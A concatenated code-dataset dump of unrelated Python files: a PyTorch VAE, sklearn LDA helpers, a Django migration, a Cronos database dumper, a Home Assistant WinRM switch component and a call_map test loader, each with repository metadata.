        self.in_channels = in_channels
        self.out_channels = out_channels
        self.build()
    def forward(self, input):
        x = input
        for layer in self.sub_layers:
            x = layer(x)
        return x
    def build(self):
        FinalActivate = lambda: torch.nn.Tanh()
        self.sub_layers = nn.ModuleList([
            nn.ConvTranspose2d(
                in_channels=self.in_channels,
                out_channels=self.out_channels,
                kernel_size=4,
                stride=2,
                padding=1,
                bias=False),
            FinalActivate()
        ])
class Distribution(object):
    """Diagonal Gaussian parameterized by [mean, logvar] concatenated along dim 1.

    With deterministic=True the variance is forced to zero, so sample() and
    mode() both return the mean and kl()/nll() return 0.
    """
    def __init__(self, parameters, deterministic=False):
        self.parameters = parameters
        # Split channel dim into mean and log-variance halves.
        self.mean, self.logvar = torch.chunk(parameters, 2, dim=1)
        # Clamp logvar for numerical stability of exp() below.
        self.logvar = torch.clamp(self.logvar, -30.0, 10.0)
        self.deterministic = deterministic
        self.std = torch.exp(0.5*self.logvar)
        self.var = torch.exp(self.logvar)
        if self.deterministic:
            # NOTE(review): device is hard-coded to cuda-if-available rather
            # than following parameters.device — confirm intended.
            self.var = self.std = torch.zeros_like(self.mean).to(
                torch.device('cuda' if torch.cuda.is_available() else 'cpu'))
    def sample(self):
        # Reparameterized sample: mean + std * eps, eps ~ N(0, I).
        device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
        x = self.mean + self.std*torch.randn(self.mean.shape).to(device)
        return x
    def kl(self, other=None):
        # KL divergence to the standard normal (other=None) or to another
        # diagonal Gaussian, summed over all non-batch dims.
        if self.deterministic:
            return torch.Tensor([0.])
        else:
            if other is None:
                return 0.5*torch.sum(torch.pow(self.mean, 2)
                                     + self.var - 1.0 - self.logvar,
                                     dim=[1,2,3])
            else:
                return 0.5*torch.sum(
                    torch.pow(self.mean - other.mean, 2) / other.var
                    + self.var / other.var - 1.0 - self.logvar + other.logvar,
                    dim=[1,2,3])
    def nll(self, sample):
        # Negative log-likelihood of `sample` under this Gaussian,
        # summed over all non-batch dims.
        if self.deterministic:
            return torch.Tensor([0.])
        logtwopi = np.log(2.0*np.pi)
        return 0.5*torch.sum(
            logtwopi+self.logvar+torch.pow(sample-self.mean, 2) / self.var,
            dim=[1,2,3])
    def mode(self):
        # The mode of a Gaussian is its mean.
        return self.mean
class Model(nn.Module):
    """Convolutional VAE-style autoencoder assembled from the layer classes above.

    encode() maps an image through n_down stride-2 stages plus a dense head
    to a Distribution over a z_dim latent; decode() inverts the path back to
    image space.  All hyperparameters are read from `config` via edflow's
    `retrieve`.
    """
    def __init__(self, config):
        super().__init__()
        import torch.backends.cudnn as cudnn
        cudnn.benchmark = True
        n_down = retrieve(config, "Model/n_down")
        z_dim = retrieve(config, "Model/z_dim")
        in_size = retrieve(config, "Model/in_size")
        # Spatial size of the feature map after n_down halvings.
        bottleneck_size = in_size // 2**n_down
        in_channels = retrieve(config, "Model/in_channels")
        norm = retrieve(config, "Model/norm")
        self.be_deterministic = retrieve(config, "Model/deterministic")
        self.feature_layers = nn.ModuleList()
        self.decoder_layers = nn.ModuleList()
        # Encoder: first stage takes the raw image channels, later stages
        # follow the scale-derived channel schedule.
        self.feature_layers.append(FeatureLayer(0, in_channels=in_channels, norm=norm))
        for scale in range(1, n_down):
            self.feature_layers.append(FeatureLayer(scale, norm=norm))
        # 2*z_dim outputs: mean and logvar halves consumed by Distribution.
        self.dense_encode = DenseEncoderLayer(n_down, bottleneck_size, 2*z_dim)
        self.dense_decode = DenseDecoderLayer(n_down-1, bottleneck_size, z_dim)
        for scale in range(n_down-1):
            self.decoder_layers.append(DecoderLayer(scale, norm=norm))
        self.image_layer = ImageLayer(out_channels=in_channels)
        # DCGAN-style init for all conv/batch-norm submodules.
        self.apply(weights_init)
        self.n_down = n_down
        self.z_dim = z_dim
        self.bottleneck_size = bottleneck_size
    def encode(self, input):
        h = input
        for layer in self.feature_layers:
            h = layer(h)
        h = self.dense_encode(h)
        return Distribution(h, deterministic=self.be_deterministic)
    def decode(self, input):
        h = input
        h = self.dense_decode(h)
        # Decoder layers were built coarse-to-fine; apply them fine-to-coarse.
        for layer in reversed(self.decoder_layers):
            h = layer(h)
        h = self.image_layer(h)
        return h
    def get_last_layer(self):
        # Weight tensor of the final transposed conv (e.g. for adaptive loss weighting).
        return self.image_layer.sub_layers[0].weight
| 9,372 | 73 | 1,058 |
e777dcf999b9a0f5498859b46c06e05526549659 | 3,120 | py | Python | src/python/utils/classification_list.py | Lamzigit/manifold_learning | f699fe4f25dbabdbc2dc9635c4e654b59806e17d | [
"MIT"
] | 10 | 2017-06-14T08:04:44.000Z | 2021-07-06T07:13:16.000Z | src/python/utils/classification_list.py | Lamzigit/manifold_learning | f699fe4f25dbabdbc2dc9635c4e654b59806e17d | [
"MIT"
] | 1 | 2020-11-18T13:08:43.000Z | 2020-11-18T13:12:39.000Z | src/python/utils/classification_list.py | Lamzigit/manifold_learning | f699fe4f25dbabdbc2dc9635c4e654b59806e17d | [
"MIT"
] | 3 | 2017-06-14T08:04:53.000Z | 2019-11-18T13:21:15.000Z | # -*- coding: utf-8 -*-
"""
Created on Sun May 1 15:02:38 2016
@author: eman
"""
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
from sklearn.metrics import accuracy_score, precision_score, f1_score, \
fbeta_score, recall_score
from skll.metrics import kappa
import numpy as np
import pandas as pd
# this is my classification experiment function which basically delegates
# which classification method I want to use on the data.
# my simple naive LDA function to classify my data. Since I have
# multiple datasets, I loop through each dataset in my list and
# and perform classificaiton on that
#---------
# LDA Prediction
#---------------
def lda_pred(Xtrain, Xtest, Ytrain, Ytest):
    """Fit a fresh LDA classifier per dataset split and predict its test set.

    Returns a list with one prediction array per dataset, in input order.
    Note: Ytest is zipped but never used here.
    """
    # empty list for the predictions
    Ypred = []
    # loop through and perform classification
    for xtrain, xtest, ytrain, ytest in zip(Xtrain,Xtest,
                                            Ytrain, Ytest):
        # initialize the model
        lda_model = LDA()
        # fit the model to the training data
        lda_model.fit(xtrain, ytrain.ravel())
        # save the results of the model predicting the testing data
        Ypred.append(lda_model.predict(xtest))
    # return this list
    return Ypred
# the same function as before except with list comprehension
# (trying to practice that pythonic-ism a bit)
| 28.363636 | 75 | 0.594231 | # -*- coding: utf-8 -*-
"""
Created on Sun May 1 15:02:38 2016
@author: eman
"""
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA
from sklearn.metrics import accuracy_score, precision_score, f1_score, \
fbeta_score, recall_score
from skll.metrics import kappa
import numpy as np
import pandas as pd
# this is my classification experiment function which basically delegates
# which classification method I want to use on the data.
def classification_exp(Xtrain, Xtest, Ytrain, Ytest, model='LDA'):
    """Dispatch a classification run to the requested model.

    Parameters
    ----------
    Xtrain, Xtest, Ytrain, Ytest : sequences of array-like
        Per-dataset splits, forwarded verbatim to the model function.
    model : str
        Only 'LDA'/'lda' is currently supported.

    Returns
    -------
    list
        Predictions from :func:`lda_pred`.

    Raises
    ------
    ValueError
        If `model` names an unsupported classifier.
    """
    if model in ['LDA', 'lda']:
        return lda_pred(Xtrain, Xtest, Ytrain, Ytest)
    # Bugfix: the original implicit string concatenation lacked separating
    # spaces, producing "available forclassification" and "timebeing".
    raise ValueError('Sorry, the {m} model is not available for '
                     'classification. Please use LDA for the time '
                     'being.'.format(m=model))
# my simple naive LDA function to classify my data. Since I have
# multiple datasets, I loop through each dataset in my list and
# and perform classificaiton on that
#---------
# LDA Prediction
#---------------
def lda_pred(Xtrain, Xtest, Ytrain, Ytest):
    """Train an LDA model per dataset and return its test-set predictions.

    Each element of the four input sequences describes one dataset; the
    result is a list with one prediction array per dataset.
    """

    def _fit_and_predict(xtr, xte, ytr):
        # Fresh classifier per dataset; labels are flattened for sklearn.
        clf = LDA()
        clf.fit(xtr, ytr.ravel())
        return clf.predict(xte)

    # Ytest participates in the zip (truncating to the shortest sequence,
    # exactly like the original) even though its values are unused.
    return [
        _fit_and_predict(xtr, xte, ytr)
        for xtr, xte, ytr, _unused in zip(Xtrain, Xtest, Ytrain, Ytest)
    ]
def accuracy_stats(Ypred, Ytest):
    """Compute per-dataset classification metrics.

    Returns a dict mapping metric name ('AA', 'AP', 'f1', 'recall',
    'kappa') to a list with one score per (prediction, truth) pair.
    """
    # Metric name -> scoring callable; each is called as func(y_true, y_pred).
    metric_funcs = (
        ('AA', accuracy_score),
        ('AP', precision_score),
        ('f1', f1_score),
        ('recall', recall_score),
        ('kappa', kappa),
    )
    stats = {name: [] for name, _ in metric_funcs}
    for ypred, ytest in zip(Ypred, Ytest):
        y_true, y_hat = ytest.ravel(), ypred.ravel()
        for name, score in metric_funcs:
            stats[name].append(score(y_true, y_hat))
    return stats
# the same function as before except with list comprehension
# (trying to practice that pythonic-ism a bit)
def accuracy_statsv2(Ypred, Ytest):
    """List-comprehension variant of :func:`accuracy_stats`.

    Bugfix: the original only filled the 'AA' entry and fell off the end
    without a return statement (so callers always got None). This version
    computes every metric and returns the stats dict.
    """
    # Flatten each (truth, prediction) pair once, up front.
    flat = [(ytest.ravel(), ypred.ravel()) for ypred, ytest in zip(Ypred, Ytest)]
    stats = {
        'AA': [accuracy_score(yt, yp) for yt, yp in flat],
        'AP': [precision_score(yt, yp) for yt, yp in flat],
        'f1': [f1_score(yt, yp) for yt, yp in flat],
        'recall': [recall_score(yt, yp) for yt, yp in flat],
        'kappa': [kappa(yt, yp) for yt, yp in flat],
    }
    return stats
def exp_runs(trials=2):
    """Run the experiment `trials` times and return the averaged results.

    Bugfix: the original assigned the SAME `[None] * trials` list to both
    'AA' and 'AP', so every `Ystats['AA'][i]` write was immediately
    overwritten by the aliased `Ystats['AP'][i]` write. Each key now gets
    its own list.

    NOTE(review): `run_exp` and `results_avg` are not defined in this
    module — presumably provided elsewhere; confirm at integration time.
    """
    Ystats = {'AA': [None] * trials, 'AP': [None] * trials}
    for trial_num in range(trials):
        Ystats['AA'][trial_num], Ystats['AP'][trial_num] = run_exp()
    return results_avg(Ystats)
| 1,489 | 0 | 90 |
b945e4d3a48a918b26d0622ca61368e2cce8cb43 | 394 | py | Python | story/migrations/0008_alter_story_user_input.py | sachink2010/DjangoTrial | 8b78a31409b614959ed45380f2b8ee9f03fa9f90 | [
"MIT"
] | null | null | null | story/migrations/0008_alter_story_user_input.py | sachink2010/DjangoTrial | 8b78a31409b614959ed45380f2b8ee9f03fa9f90 | [
"MIT"
] | null | null | null | story/migrations/0008_alter_story_user_input.py | sachink2010/DjangoTrial | 8b78a31409b614959ed45380f2b8ee9f03fa9f90 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.7 on 2021-10-31 22:24
from django.db import migrations, models
| 20.736842 | 51 | 0.606599 | # Generated by Django 3.2.7 on 2021-10-31 22:24
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django (see header): widens Story.user_input to a
    # 400-character CharField. Hand-edits are conventionally avoided so the
    # migration graph stays consistent with `makemigrations` output.
    dependencies = [
        ('story', '0007_alter_story_api_response'),
    ]
    operations = [
        migrations.AlterField(
            model_name='story',
            name='user_input',
            field=models.CharField(max_length=400),
        ),
    ]
| 0 | 280 | 23 |
2d11f9cd5efb4254316d37a90c446e6431852a6d | 799 | py | Python | Xana/XsvsAna/mp_prob.py | reiserm/Xana | 056f2bf2da67ba0dade49bb4b56ea2afd42b36bd | [
"MIT"
] | 1 | 2021-01-25T08:57:57.000Z | 2021-01-25T08:57:57.000Z | Xana/XsvsAna/mp_prob.py | reiserm/Xana | 056f2bf2da67ba0dade49bb4b56ea2afd42b36bd | [
"MIT"
] | 21 | 2020-03-23T12:50:32.000Z | 2021-05-07T07:54:38.000Z | Xana/XsvsAna/mp_prob.py | reiserm/Xana | 056f2bf2da67ba0dade49bb4b56ea2afd42b36bd | [
"MIT"
] | 2 | 2020-03-22T10:31:09.000Z | 2020-07-01T14:00:28.000Z | import numpy as np
from time import time
| 25.774194 | 88 | 0.519399 | import numpy as np
from time import time
def mp_prob(method, nbins, nf, lind, nq, quc, quce):
    """Consume per-ROI frame chunks from `quc` and build count statistics.

    For every ROI `qi` and frame `t`, column ``prob[qi, :, t]`` holds the
    frame's total count followed by its histogram over ``nbins`` integer
    levels, all divided by ``lind[qi]``. When ``nf`` frames have been
    processed the input queue is closed and ``[prob, tcalc]`` is pushed to
    the output queue ``quce``.

    `method` is unused here; it is kept for interface compatibility.
    """
    t_start = time()
    prob = np.zeros((nq, nbins + 1, nf), dtype=np.float32)
    # Bin edges centred on the integers 0..nbins-1 (same as the original's
    # per-frame np.arange(nbins + 1) - 0.5, hoisted out of the loop).
    bin_edges = np.arange(nbins + 1) - 0.5
    frames_done = 0
    while frames_done < nf:
        chunk = quc.get()
        n_new = chunk[0].shape[0]
        for qi in range(nq):
            for offset, line in enumerate(chunk[qi]):
                counts = np.histogram(line, bins=bin_edges)[0]
                prob[qi, :, frames_done + offset] = (
                    np.append(np.sum(line), counts) / lind[qi]
                )
        frames_done += n_new
    # Done reading: release the queue's feeder thread, then ship the result.
    quc.close()
    quc.join_thread()
    quce.put([prob, time() - t_start])
| 734 | 0 | 23 |
f888e997ec9f6e4baa38e1930f54f6a97bbdc19b | 1,509 | py | Python | crodump/dumpdbfields.py | nlitsme/cronodump | 9a394938645368529847bc96bb5ee33ea9f91a99 | [
"MIT"
] | null | null | null | crodump/dumpdbfields.py | nlitsme/cronodump | 9a394938645368529847bc96bb5ee33ea9f91a99 | [
"MIT"
] | null | null | null | crodump/dumpdbfields.py | nlitsme/cronodump | 9a394938645368529847bc96bb5ee33ea9f91a99 | [
"MIT"
] | null | null | null | """
`dumpdbfields` demonstrates how to enumerate tables and records.
"""
import os
import os.path
from Database import Database
if __name__ == "__main__":
main()
| 30.18 | 77 | 0.5222 | """
`dumpdbfields` demonstrates how to enumerate tables and records.
"""
import os
import os.path
from Database import Database
def main():
    """Walk a directory tree and dump fields for each Cronos database found.

    Usage: ``python3 dumpdbfields.py <path> [reclimit]`` — for every
    directory containing a ``crostru.dat`` file, dumps each table and the
    first `reclimit` (default 100) records of that table.

    Bugfix: the original incremented a counter after printing and tested
    ``i > reclimit``, so it printed ``reclimit + 1`` records. The loop now
    stops after exactly `reclimit` records, matching the usage text.
    """
    import sys
    if len(sys.argv) == 1:
        print("Usage: python3 dumpdbfields.py <path> [reclimit:100]")
        print("""
For each Cronos database found under <path>, will output the first `reclimit`
records of each table found in those databases""")
        return
    dbpath = sys.argv[1]
    # base-0 int() lets the limit be given as decimal, hex (0x..) or octal.
    reclimit = int(sys.argv[2], 0) if len(sys.argv) == 3 else 100
    # construct a dummy args object (Database/table dumpers expect .verbose).
    class Cls: pass
    args = Cls()
    args.verbose = False
    # recurse all subdirectories
    for path, _, files in os.walk(dbpath):
        # check if there is a crostru file in this directory.
        if any(_ for _ in files if _.lower() == "crostru.dat"):
            print("==>", path, "<==")
            try:
                db = Database(path)
                for tab in db.enumerate_tables():
                    tab.dump(args)
                    print("nr of records: %d" % db.nrofrecords())
                    for i, rec in enumerate(db.enumerate_records(tab)):
                        if i >= reclimit:
                            break
                        for field, fielddef in zip(rec.fields, tab.fields):
                            print(">> %s -- %s" % (fielddef, field.content))
            except Exception as e:
                # Best-effort: a corrupt database must not abort the walk.
                print("ERROR: %s" % e)
if __name__ == "__main__":
    main()
| 1,317 | 0 | 23 |
e1ec15ebb78c0b7e5402babd3c405d177d91284d | 6,892 | py | Python | custom_components/ha_pywinrm/switch.py | k3wio/ha_pywinrm | e63d0203507a4c1830eb0f99c8b6f7daa0a8bfb5 | [
"MIT"
] | null | null | null | custom_components/ha_pywinrm/switch.py | k3wio/ha_pywinrm | e63d0203507a4c1830eb0f99c8b6f7daa0a8bfb5 | [
"MIT"
] | null | null | null | custom_components/ha_pywinrm/switch.py | k3wio/ha_pywinrm | e63d0203507a4c1830eb0f99c8b6f7daa0a8bfb5 | [
"MIT"
] | null | null | null | """Support for winrm commands to turn a switch on/off."""
import logging
import winrm
import voluptuous as vol
from homeassistant.components.switch import (
ENTITY_ID_FORMAT,
PLATFORM_SCHEMA,
SwitchDevice,
)
from homeassistant.const import (
CONF_COMMAND_OFF,
CONF_COMMAND_ON,
CONF_COMMAND_STATE,
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_FRIENDLY_NAME,
CONF_SWITCHES,
CONF_USERNAME,
CONF_VALUE_TEMPLATE,
)
from .const import DOMAIN
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
# Per-switch configuration schema: every key is optional; the on/off
# commands default to the no-op PowerShell command "true".
SWITCH_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_COMMAND_OFF, default="true"): cv.string,
        vol.Optional(CONF_COMMAND_ON, default="true"): cv.string,
        vol.Optional(CONF_COMMAND_STATE): cv.string,
        vol.Optional(CONF_FRIENDLY_NAME): cv.string,
        vol.Optional(CONF_HOST): cv.string,
        vol.Optional(CONF_PASSWORD): cv.string,
        vol.Optional(CONF_USERNAME): cv.string,
        vol.Optional(CONF_VALUE_TEMPLATE): cv.template,
    }
)
# Platform schema: a mapping of slug -> per-switch config as defined above.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {vol.Required(CONF_SWITCHES): cv.schema_with_slug_keys(SWITCH_SCHEMA)}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Find and return switches controlled by shell commands."""
    switch_configs = config.get(CONF_SWITCHES, {})
    entities = []
    for object_id, conf in switch_configs.items():
        template = conf.get(CONF_VALUE_TEMPLATE)
        if template is not None:
            # Templates need a hass reference before they can render.
            template.hass = hass
        entities.append(
            CommandSwitch(
                hass,
                object_id,
                conf.get(CONF_FRIENDLY_NAME, object_id),
                conf.get(CONF_COMMAND_ON),
                conf.get(CONF_COMMAND_OFF),
                conf.get(CONF_COMMAND_STATE),
                conf.get(CONF_HOST),
                conf.get(CONF_PASSWORD),
                conf.get(CONF_USERNAME),
                template,
            )
        )
    if not entities:
        _LOGGER.error("No switches added")
        return False
    add_entities(entities)
class CommandSwitch(SwitchDevice):
    """Representation a switch that can be toggled using shell commands.

    Commands are executed remotely over WinRM (PowerShell). If a state
    command is configured the entity is polled; otherwise state is assumed
    from the last successful on/off command.
    """

    def __init__(
        self,
        hass,
        object_id,
        friendly_name,
        command_on,
        command_off,
        command_state,
        host,
        password,
        username,
        value_template,
    ):
        """Initialize the switch."""
        self._hass = hass
        self.entity_id = ENTITY_ID_FORMAT.format(object_id)
        self._name = friendly_name
        self._state = False
        self._command_on = command_on
        self._command_off = command_off
        self._command_state = command_state
        self._host = host
        self._password = password
        self._username = username
        self._value_template = value_template

    @staticmethod
    def _switch(command, host, password, username):
        """Run `command` over WinRM; return True iff it exits with status 0.

        Bugfix: `success` is now initialized before the try block. Previously
        an exception from winrm.Session()/run_ps() left it unbound and the
        `if not success` check below raised UnboundLocalError.
        """
        _LOGGER.info("Running command: %s on host: %s" % (command, host))
        success = False
        try:
            session = winrm.Session(host, auth=(username, password))
            response_object = session.run_ps(command)
            success = response_object.status_code == 0
        except Exception as e:
            # Single consolidated log (the original logged the exception twice).
            _LOGGER.error("Command failed: %s on host: %s. %s" % (command, host, e))
        if not success:
            _LOGGER.error("Command failed: %s on host: %s" % (command, host))
        return success

    @staticmethod
    def _query_state_value(command, host, password, username):
        """Execute the state command and return its stdout as text.

        Returns None when the command cannot be executed.
        """
        _LOGGER.info("Running state command: %s on host: %s" % (command, host))
        try:
            session = winrm.Session(host, auth=(username, password))
            response_object = session.run_ps(command)
            return response_object.std_out.strip().decode("utf-8")
        except Exception as e:
            _LOGGER.error("State command failed: %s on host: %s. %s" % (command, host, e))
            return None

    @staticmethod
    def _query_state_code(command, host, password, username):
        """Execute the state command and return its exit status code.

        Returns None when the command cannot be executed.
        """
        _LOGGER.info("Running state command: %s on host: %s" % (command, host))
        try:
            session = winrm.Session(host, auth=(username, password))
            response_object = session.run_ps(command)
            return response_object.status_code
        except Exception as e:
            _LOGGER.error("State command failed: %s on host: %s. %s" % (command, host, e))
            return None

    @property
    def should_poll(self):
        """Only poll if we have state command."""
        return self._command_state is not None

    @property
    def name(self):
        """Return the name of the switch."""
        return self._name

    @property
    def is_on(self):
        """Return true if device is on."""
        return self._state

    @property
    def assumed_state(self):
        """Return true if we do optimistic updates."""
        return self._command_state is None

    def _query_state(self):
        """Query for state (stdout when templated, exit code otherwise)."""
        if not self._command_state:
            _LOGGER.error("No state command specified")
            return
        if self._value_template:
            return CommandSwitch._query_state_value(
                self._command_state, self._host, self._password, self._username,
            )
        return CommandSwitch._query_state_code(
            self._command_state, self._host, self._password, self._username,
        )

    def update(self):
        """Update device state."""
        if self._command_state:
            # str() makes a failed query ("None") compare as off, not crash.
            payload = str(self._query_state())
            if self._value_template:
                payload = self._value_template.render_with_possible_json_value(payload)
            self._state = payload.lower() == "true"

    def turn_on(self, **kwargs):
        """Turn the device on (optimistic update unless a state command exists)."""
        if (
            CommandSwitch._switch(
                self._command_on, self._host, self._password, self._username
            )
            and not self._command_state
        ):
            self._state = True
            self.schedule_update_ha_state()

    def turn_off(self, **kwargs):
        """Turn the device off (optimistic update unless a state command exists)."""
        if (
            CommandSwitch._switch(
                self._command_off, self._host, self._password, self._username
            )
            and not self._command_state
        ):
            self._state = False
            self.schedule_update_ha_state()
| 31.760369 | 90 | 0.614335 | """Support for winrm commands to turn a switch on/off."""
import logging
import winrm
import voluptuous as vol
from homeassistant.components.switch import (
ENTITY_ID_FORMAT,
PLATFORM_SCHEMA,
SwitchDevice,
)
from homeassistant.const import (
CONF_COMMAND_OFF,
CONF_COMMAND_ON,
CONF_COMMAND_STATE,
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_FRIENDLY_NAME,
CONF_SWITCHES,
CONF_USERNAME,
CONF_VALUE_TEMPLATE,
)
from .const import DOMAIN
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
# Per-switch configuration schema; on/off commands default to the no-op "true".
SWITCH_SCHEMA = vol.Schema(
    {
        vol.Optional(CONF_COMMAND_OFF, default="true"): cv.string,
        vol.Optional(CONF_COMMAND_ON, default="true"): cv.string,
        vol.Optional(CONF_COMMAND_STATE): cv.string,
        vol.Optional(CONF_FRIENDLY_NAME): cv.string,
        vol.Optional(CONF_HOST): cv.string,
        vol.Optional(CONF_PASSWORD): cv.string,
        vol.Optional(CONF_USERNAME): cv.string,
        vol.Optional(CONF_VALUE_TEMPLATE): cv.template,
    }
)
# Platform schema: mapping of slug -> per-switch config.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {vol.Required(CONF_SWITCHES): cv.schema_with_slug_keys(SWITCH_SCHEMA)}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
    """Find and return switches controlled by shell commands."""
    devices = config.get(CONF_SWITCHES, {})
    switches = []
    for object_id, device_config in devices.items():
        value_template = device_config.get(CONF_VALUE_TEMPLATE)
        if value_template is not None:
            # Templates need a hass reference before they can render.
            value_template.hass = hass
        switches.append(
            CommandSwitch(
                hass,
                object_id,
                # Fall back to the slug when no friendly name is configured.
                device_config.get(CONF_FRIENDLY_NAME, object_id),
                device_config.get(CONF_COMMAND_ON),
                device_config.get(CONF_COMMAND_OFF),
                device_config.get(CONF_COMMAND_STATE),
                device_config.get(CONF_HOST),
                device_config.get(CONF_PASSWORD),
                device_config.get(CONF_USERNAME),
                value_template,
            )
        )
    if not switches:
        _LOGGER.error("No switches added")
        return False
    add_entities(switches)
class CommandSwitch(SwitchDevice):
    """Representation a switch that can be toggled using shell commands."""
    def __init__(
        self,
        hass,
        object_id,
        friendly_name,
        command_on,
        command_off,
        command_state,
        host,
        password,
        username,
        value_template,
    ):
        """Initialize the switch."""
        self._hass = hass
        self.entity_id = ENTITY_ID_FORMAT.format(object_id)
        self._name = friendly_name
        self._state = False
        self._command_on = command_on
        self._command_off = command_off
        self._command_state = command_state
        self._host = host
        self._password = password
        self._username = username
        self._value_template = value_template
    @staticmethod
    def _switch(command, host, password, username):
        """Execute the actual commands."""
        _LOGGER.info("Running command: %s on host: %s" % (command, host))
        # NOTE(review): if winrm.Session()/run_ps() raises, `success` is never
        # bound, so the `if not success` check below raises UnboundLocalError.
        # Initialize `success = False` before the try block — confirm and fix.
        try:
            session = winrm.Session(host, auth=(username, password))
            response_object = session.run_ps(command)
            success = response_object.status_code == 0
        except Exception as e:
            _LOGGER.error("Command failed: %s on host: %s. %s" % (command, host, e))
            # NOTE(review): this second log line duplicates the exception above.
            _LOGGER.error(" %s" % (e))
        if not success:
            _LOGGER.error("Command failed: %s on host: %s" % (command, host))
        return success
    @staticmethod
    def _query_state_value(command, host, password, username):
        """Execute state command for return value."""
        _LOGGER.info("Running state command: %s on host: %s" % (command, host))
        try:
            session = winrm.Session(host, auth=(username, password))
            response_object = session.run_ps(command)
            std_out = response_object.std_out.strip().decode("utf-8")
            # std_err / status_code are collected but never used.
            std_err = response_object.std_err.strip().decode("utf-8")
            status_code = response_object.status_code
            return std_out
        except Exception as e:
            # Implicitly returns None on failure.
            _LOGGER.error("State command failed: %s on host: %s. %s" % (command, host, e))
    @staticmethod
    def _query_state_code(command, host, password, username):
        """Execute state command for return code."""
        _LOGGER.info("Running state command: %s on host: %s" % (command, host))
        try:
            session = winrm.Session(host, auth=(username, password))
            response_object = session.run_ps(command)
            status_code = response_object.status_code
            return status_code
        except Exception as e:
            # Implicitly returns None on failure.
            _LOGGER.error("State command failed: %s on host: %s. %s" % (command, host, e))
    @property
    def should_poll(self):
        """Only poll if we have state command."""
        return self._command_state is not None
    @property
    def name(self):
        """Return the name of the switch."""
        return self._name
    @property
    def is_on(self):
        """Return true if device is on."""
        return self._state
    @property
    def assumed_state(self):
        """Return true if we do optimistic updates."""
        return self._command_state is None
    def _query_state(self):
        """Query for state."""
        if not self._command_state:
            _LOGGER.error("No state command specified")
            return
        # Templated switches compare stdout; untemplated ones use exit codes.
        if self._value_template:
            return CommandSwitch._query_state_value(
                self._command_state, self._host, self._password, self._username,
            )
        return CommandSwitch._query_state_code(
            self._command_state, self._host, self._password, self._username,
        )
    def update(self):
        """Update device state."""
        if self._command_state:
            # str() turns a failed (None) query into "None", which reads as off.
            payload = str(self._query_state())
            if self._value_template:
                payload = self._value_template.render_with_possible_json_value(payload)
            self._state = payload.lower() == "true"
    def turn_on(self, **kwargs):
        """Turn the device on."""
        if (
            CommandSwitch._switch(
                self._command_on, self._host, self._password, self._username
            )
            and not self._command_state
        ):
            self._state = True
            self.schedule_update_ha_state()
    def turn_off(self, **kwargs):
        """Turn the device off."""
        if (
            CommandSwitch._switch(
                self._command_off, self._host, self._password, self._username
            )
            and not self._command_state
        ):
            self._state = False
            self.schedule_update_ha_state()
| 0 | 0 | 0 |
eba0e69cd304f00bad84194c49e2a9dd42e953f7 | 1,343 | py | Python | tests/load_test_modules.py | ajylee/call_map | 21e7684b0814eae6f16cd4bc75597dc4e9239ec0 | [
"BSD-2-Clause"
] | 20 | 2017-12-24T00:19:15.000Z | 2021-11-15T07:42:25.000Z | tests/load_test_modules.py | ajylee/call_map | 21e7684b0814eae6f16cd4bc75597dc4e9239ec0 | [
"BSD-2-Clause"
] | 1 | 2017-10-22T21:03:41.000Z | 2017-12-24T04:26:22.000Z | tests/load_test_modules.py | ajylee/call_map | 21e7684b0814eae6f16cd4bc75597dc4e9239ec0 | [
"BSD-2-Clause"
] | 2 | 2017-11-04T10:06:59.000Z | 2019-08-01T22:24:49.000Z | import toolz as tz
from call_map.core import UserScopeSettings, ScopeSettings, OrganizerNode
from call_map.jedi_dump import make_scope_settings
from call_map import project_settings_module
from call_map.project_settings_module import Project
from pathlib import Path
from sys import path as runtime_sys_path
# Scope: every *.py under tests/test_modules, discovered as scripts.
test_modules_dir = Path(__file__).parent.joinpath('test_modules')
user_scope_settings = UserScopeSettings(
    module_names=[],
    file_names=test_modules_dir.glob('*.py'),
    include_runtime_sys_path=True,
    add_to_sys_path=([str(test_modules_dir)] + runtime_sys_path),
)
scope_settings = make_scope_settings(is_new_project=True,
                                     saved_scope_settings=ScopeSettings([], [], []),
                                     user_scope_settings=user_scope_settings)  # type: ScopeSettings
# Unsaved project (no settings file) populated from the scope above.
project = Project(None)
project.settings.update(
    {project_settings_module.modules: scope_settings.module_names,
     project_settings_module.scripts: scope_settings.scripts,
     project_settings_module.sys_path: scope_settings.effective_sys_path})
project.make_platform_specific_nodes('python')
# Root organizer node combining all Python module and script nodes.
root_node = OrganizerNode('Root', [],
                          list(tz.concatv(project.module_nodes['python'].values(),
                                          project.script_nodes['python'].values())))
| 38.371429 | 100 | 0.724497 | import toolz as tz
from call_map.core import UserScopeSettings, ScopeSettings, OrganizerNode
from call_map.jedi_dump import make_scope_settings
from call_map import project_settings_module
from call_map.project_settings_module import Project
from pathlib import Path
from sys import path as runtime_sys_path
# Scope: every *.py under tests/test_modules, discovered as scripts.
test_modules_dir = Path(__file__).parent.joinpath('test_modules')
user_scope_settings = UserScopeSettings(
    module_names=[],
    file_names=test_modules_dir.glob('*.py'),
    include_runtime_sys_path=True,
    add_to_sys_path=([str(test_modules_dir)] + runtime_sys_path),
)
scope_settings = make_scope_settings(is_new_project=True,
                                     saved_scope_settings=ScopeSettings([], [], []),
                                     user_scope_settings=user_scope_settings)  # type: ScopeSettings
# Unsaved project (no settings file) populated from the scope above.
project = Project(None)
project.settings.update(
    {project_settings_module.modules: scope_settings.module_names,
     project_settings_module.scripts: scope_settings.scripts,
     project_settings_module.sys_path: scope_settings.effective_sys_path})
project.make_platform_specific_nodes('python')
# Root organizer node combining all Python module and script nodes.
root_node = OrganizerNode('Root', [],
                          list(tz.concatv(project.module_nodes['python'].values(),
                                          project.script_nodes['python'].values())))
| 0 | 0 | 0 |
